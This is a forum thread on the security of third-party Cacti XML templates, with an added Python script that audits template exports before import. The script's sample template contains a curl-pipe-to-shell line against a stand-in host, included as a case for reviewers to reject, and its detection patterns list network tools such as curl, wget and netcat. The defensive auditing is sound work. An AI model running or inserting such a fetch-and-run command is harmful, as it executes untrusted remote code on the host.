Cacti Security
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
Cacti Security
Hello Cacti Enthusiasts,
I have recently installed Cacti 0.8.7e and have a question about the XML-coded graph templates that are posted by other users. How secure are these templates? Has anyone found any with malicious intent, such as pointing traffic out of your intranet to a remote server? As I am working for a company that wishes to implement this RRD graphing tool, I have a multitude of risk assessments to produce based on a preliminary investigation. I know there are associated risks with SQL injections and PHP alterations in previous versions of Cacti; have all of these been addressed? I could not find specific information in the release notes. I do not speak XML, so I was really looking for some insight into these templates.
Thank you very much for your time in advance gentlemen,
SecurityPro
1) moving to a forum with a wider audience.
2) I've never heard of anything like that happening with altering the XML templates. Feel free to look through the XML parsing code, analyze it yourself, and come to your own conclusions. "Speaking" XML isn't that hard really -- have you looked at an XML file in a web browser?
| Scripts: Monitor processes | RFC1213 MIB | DOCSIS Stats | Dell PowerEdge | Speedfan | APC UPS | DOCSIS CMTS | 3ware | Motorola Canopy |
| Guides: Windows Install | [HOWTO] Debug Windows NTFS permission problems |
| Tools: Windows All-in-one Installer |
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
Cacti
Yes sir, I have. I researched some parts of XML and it seems that it is geared towards being a plain-text language, meaning both the PC and the user can interpret the data clearly. The template I really have in question contains a few different sections that incorporate MD5 hashes, which are obviously much less secure than something like SHA-2, but I found it odd that XML code would even include a hash; is this normal practice? Also, where shall I post? I work in a Windows environment, so I assumed this was a safe haven.
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
The hash you see is actually a combination of things, some which is outlined here: http://docs.cacti.net/howto:determine_c ... te_version
| Scripts: Monitor processes | RFC1213 MIB | DOCSIS Stats | Dell PowerEdge | Speedfan | APC UPS | DOCSIS CMTS | 3ware | Motorola Canopy |
| Guides: Windows Install | [HOWTO] Debug Windows NTFS permission problems |
| Tools: Windows All-in-one Installer |
- Howie
- Cacti Guru User
- Posts: 5508
- Joined: Thu Sep 16, 2004 5:53 am
- Location: United Kingdom
As far as I know, for the most part the hashes are just unique IDs, not any kind of checksum, so how 'secure' MD5 is vs SHA is not really relevant.
It does bring up another interesting issue though - I can't think of anything that stops someone creating a script query that runs some random command line and then exporting that for the rest of us to enjoy. I don't really see what you could do to protect against it either, apart from adding some restrictions on where the script query command runs from, which doesn't really address the problem.
Ultimately, you are taking software from at least two parties (the Cacti team and the template author) and running it on your systems. If you either don't trust them or don't want to review the code yourself, you should consider that risk. Plenty of people consider the payoff exceeds the risk. Presumably you have done the same analysis for PHP, MySQL, rrdtool, the OS, etc etc etc?
Technology isn't going to help you, without going to some kind of code-signing for templates, and even then you still need to trust whoever is signing the templates.
Weathermap 0.98a is out! & QuickTree 1.0. Superlinks is over there now (and built-in to Cacti 1.x).
Some Other Cacti tweaks, including strip-graphs, icons and snmp/netflow stuff.
(Let me know if you have UK DevOps or Network Ops opportunities, too!)
- TheWitness
- Developer
- Posts: 17007
- Joined: Tue May 14, 2002 5:08 pm
- Location: MI, USA
Agreeing with Howie. True understanding begins when we realize how little we truly understand. And in doing so, we first see, then understand, and then we can speak from the standpoint of both knowledge and understanding.
You must seek first to understand. That understanding can be sped along by going to http://docs.cacti.net
TheWitness
True understanding begins only when we realize how little we truly understand...
Life is an adventure, let yours begin with Cacti!
Author of dozens of Cacti plugins and customizations. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
GitHub Repository with Supported Plugins
Percona Device Packages (no support)
Interesting Device Packages
For those wondering, I'm still here, but lost in the shadows. Yearning for fewer bugs. Who wants a Cacti 1.3/2.0? Streams anyone?
- Posts: 5
- Joined: Thu Sep 17, 2009 9:37 am
Trust
So would it be safe to say that all templates developed by an author other than BSOD2600 or Howard Jones should be avoided?
(Only trusting the implied good intentions of the developers)
- Howie
- Cacti Guru User
- Posts: 5508
- Joined: Thu Sep 16, 2004 5:53 am
- Location: United Kingdom
Re: Trust
SecurityPro wrote: So would it be safe to say that all templates developed by an author other than BSOD2600 or Howard Jones should be avoided?
(Only trusting the implied good intentions of the developers)
Don't trust me. I don't even trust me half the time.
Weathermap 0.98a is out! & QuickTree 1.0. Superlinks is over there now (and built-in to Cacti 1.x).
Some Other Cacti tweaks, including strip-graphs, icons and snmp/netflow stuff.
(Let me know if you have UK DevOps or Network Ops opportunities, too!)
- TheWitness
- Developer
- Posts: 17007
- Joined: Tue May 14, 2002 5:08 pm
- Location: MI, USA
The most appropriate methodology to accomplish this is to have two servers:
1) Production
2) Test
Make sure you make backups. Then, you must install the Templates on your Test box. Qualify them, and once qualified, export and import on your production server.
Until we have template signing and certification processes established, this is the most appropriate methodology to utilize.
TheWitness
True understanding begins only when we realize how little we truly understand...
Life is an adventure, let yours begin with Cacti!
Author of dozens of Cacti plugins and customizations. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
GitHub Repository with Supported Plugins
Percona Device Packages (no support)
Interesting Device Packages
For those wondering, I'm still here, but lost in the shadows. Yearning for fewer bugs. Who wants a Cacti 1.3/2.0? Streams anyone?
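Howie's point above is that nothing stops a template author from shipping a data input method whose command line does something other than collect metrics, and TheWitness's answer is to qualify every template on a test box before it reaches production. The script below is an added example of what that qualification step can look like in practice; it is not code from the Cacti project or from anyone in this thread. It parses a Cacti 0.8-style template export, picks out every data input method whose type executes an external command, prints the exact command string the poller would run, and flags the things a reviewer should look at first (network tools, remote URLs, shell metacharacters, commands not rooted in the Cacti scripts directory). The element names `type_id` and `input_string`, the `hash_…` container tags and the type_id numbering are assumptions about the 0.8 export format; the embedded template is constructed for the example, and the second data input method in it is deliberately one that a reviewer should reject.

```python
"""Pre-import audit of a Cacti 0.8-style template export (added example).

Lists every data input method whose type executes an external command,
together with the command string, and flags patterns a reviewer should
inspect before installing the template on the test server.
"""
import re
import xml.etree.ElementTree as ET

# Assumed Cacti data input method type_id values for the command-executing
# types (SNMP types 1 and 2 never run a command and are skipped).
SCRIPT_TYPE_IDS = {
    "3": "Script/Command",
    "4": "Script Query",
    "5": "Script - Script Server",
    "6": "Script Query - Script Server",
}

# Heuristics, in report order. Each is something a reviewer wants called out,
# not proof of malice: a legitimate template can trip one and still be fine.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget|nc|ncat|netcat|ssh|scp|ftp|tftp)\b"), "network tool"),
    (re.compile(r"\b(bash|sh|perl|python|php)\s+-c\b"), "inline interpreter"),
    (re.compile(r"[;&|`$]|\$\("), "shell metacharacter"),
    (re.compile(r"https?://|ftp://"), "remote URL"),
    (re.compile(r"^(?!<path_(cacti|php_binary)>)"), "not rooted in <path_cacti>"),
]

# Constructed sample export. Cacti writes its <path_cacti>-style placeholders
# XML-escaped inside text nodes, which is why they appear as &lt;...&gt; here.
SAMPLE_TEMPLATE = """<cacti>
  <hash_030013aabbccdd00112233445566778899aabb>
    <name>Host CPU Utilization (constructed)</name>
    <type_id>5</type_id>
    <input_string>&lt;path_php_binary&gt; -q &lt;path_cacti&gt;/scripts/ss_host_cpu.php &lt;hostname&gt;</input_string>
  </hash_030013aabbccdd00112233445566778899aabb>
  <hash_030013ffeeddcc00112233445566778899ccdd>
    <name>Disk stats (constructed, should be rejected)</name>
    <type_id>3</type_id>
    <input_string>perl &lt;path_cacti&gt;/scripts/disk.pl &lt;hostname&gt;; curl -s http://example.invalid/x.sh | sh</input_string>
  </hash_030013ffeeddcc00112233445566778899ccdd>
  <hash_01001322222222222222222222222222222222>
    <name>Some graph template (constructed)</name>
    <graph><title>|host_description| - Disk</title></graph>
  </hash_01001322222222222222222222222222222222>
</cacti>"""


def audit_template(xml_text):
    """Return one finding dict per command-executing data input method."""
    root = ET.fromstring(xml_text)
    findings = []
    for node in root:
        type_id = node.findtext("type_id")
        if type_id not in SCRIPT_TYPE_IDS:
            continue  # graph/data templates, SNMP methods, etc. run no command
        command = (node.findtext("input_string") or "").strip()
        flags = [label for rx, label in SUSPICIOUS if rx.search(command)]
        findings.append({
            "hash": node.tag,
            "name": node.findtext("name") or "",
            "type": SCRIPT_TYPE_IDS[type_id],
            "command": command,
            "flags": flags,
        })
    return findings


def flagged(findings):
    """Only the findings that tripped at least one heuristic."""
    return [f for f in findings if f["flags"]]


def audit_file(path):
    """Audit a template export saved on disk (e.g. before importing it)."""
    with open(path, encoding="utf-8") as fh:
        return audit_template(fh.read())


if __name__ == "__main__":
    for f in audit_template(SAMPLE_TEMPLATE):
        status = "REVIEW" if f["flags"] else "ok"
        print(f"[{status}] {f['name']} ({f['type']})")
        print(f"    {f['command']}")
        for flag in f["flags"]:
            print(f"    - {flag}")
```

Run it against a downloaded template with `audit_file("some_template.xml")` on the test box before importing; anything marked REVIEW gets read by a human, and the command strings printed for the ok entries are still worth a glance, since the heuristics only narrow the list rather than replace the review Howie describes.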
Yes, maybe having two servers is really a good idea, so I guess that is the best thing we should do for the security of the site: one for testing and one for the final, functioning one.
_________________
Home Security Systems